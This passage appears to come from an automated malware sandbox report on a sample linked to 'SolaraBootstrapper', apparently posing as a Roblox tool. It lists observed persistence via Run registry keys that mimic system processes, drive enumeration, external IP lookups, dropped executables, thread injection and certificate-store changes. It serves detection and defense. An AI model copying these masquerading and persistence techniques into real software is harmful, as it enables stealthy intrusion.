Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" sddsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" Refcrt.exe -
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exeflow pid process 19 1660 msiexec.exe 20 1660 msiexec.exe 24 1660 msiexec.exe 30 1660 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com 22 ipinfo.io 23 ipinfo.io -
Drops file in System32 directory 6 IoCs
Processes:
csc.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File created \??\c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP csc.exe File created \??\c:\Windows\System32\nkeb0e.exe csc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2620 set thread context of 2228 2620 conhost.exe explorer.exe -
Drops file in Program Files directory 14 IoCs
Processes:
Refcrt.execsc.execsc.execsc.exedescription ioc process File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\817c8c8ec737a7 Refcrt.exe File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP csc.exe File created C:\Program Files\Common Files\886983d96e3d3e Refcrt.exe File created C:\Program Files (x86)\Common Files\DESIGNER\6203df4a6bafc7 Refcrt.exe File created \??\c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP csc.exe File created \??\c:\Program Files (x86)\Windows Portable Devices\dllhost.exe csc.exe File created C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe Refcrt.exe File created C:\Program Files (x86)\Windows Portable Devices\5940a34987c991 Refcrt.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe Refcrt.exe File created \??\c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP csc.exe File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe csc.exe File created C:\Program Files (x86)\Windows Portable Devices\dllhost.exe Refcrt.exe File created \??\c:\Program Files (x86)\Common Files\DESIGNER\lsass.exe csc.exe File created C:\Program Files\Common Files\csrss.exe Refcrt.exe -
Drops file in Windows directory 18 IoCs
Processes:
msiexec.exeComContainerbrowserRefRuntime.execsc.exeRefcrt.execsc.exesddsfsdf.exedescription ioc process File opened for modification C:\Windows\Installer\f76f1ed.msi msiexec.exe File created C:\Windows\DigitalLocker\it-IT\lsm.exe ComContainerbrowserRefRuntime.exe File created C:\Windows\DigitalLocker\it-IT\101b941d020240 ComContainerbrowserRefRuntime.exe File created \??\c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP csc.exe File created C:\Windows\Installer\f76f1ed.msi msiexec.exe File created C:\Windows\AppPatch\ja-JP\smss.exe Refcrt.exe File created C:\Windows\twain_32\0a1fd5f707cd16 Refcrt.exe File opened for modification C:\Windows\Installer\MSIFA4C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFC22.tmp msiexec.exe File created \??\c:\Windows\AppPatch\ja-JP\smss.exe csc.exe File created \??\c:\Windows\twain_32\sppsvc.exe csc.exe File created C:\Windows\Registration\CRMLog\886983d96e3d3e Refcrt.exe File created C:\Windows\twain_32\sppsvc.exe Refcrt.exe File created C:\Windows\xdwd.dll sddsfsdf.exe File opened for modification C:\Windows\Installer\MSIFBA5.tmp msiexec.exe File created \??\c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP csc.exe File created C:\Windows\Registration\CRMLog\csrss.exe Refcrt.exe File created C:\Windows\AppPatch\ja-JP\69ddcba757bf72 Refcrt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2080 1192 WerFault.exe SolaraBootstrapper.exe -
Processes:
sppsvc.exeSolaraBootstrapper.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 sppsvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 sppsvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 sppsvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 sppsvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 sppsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 SolaraBootstrapper.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c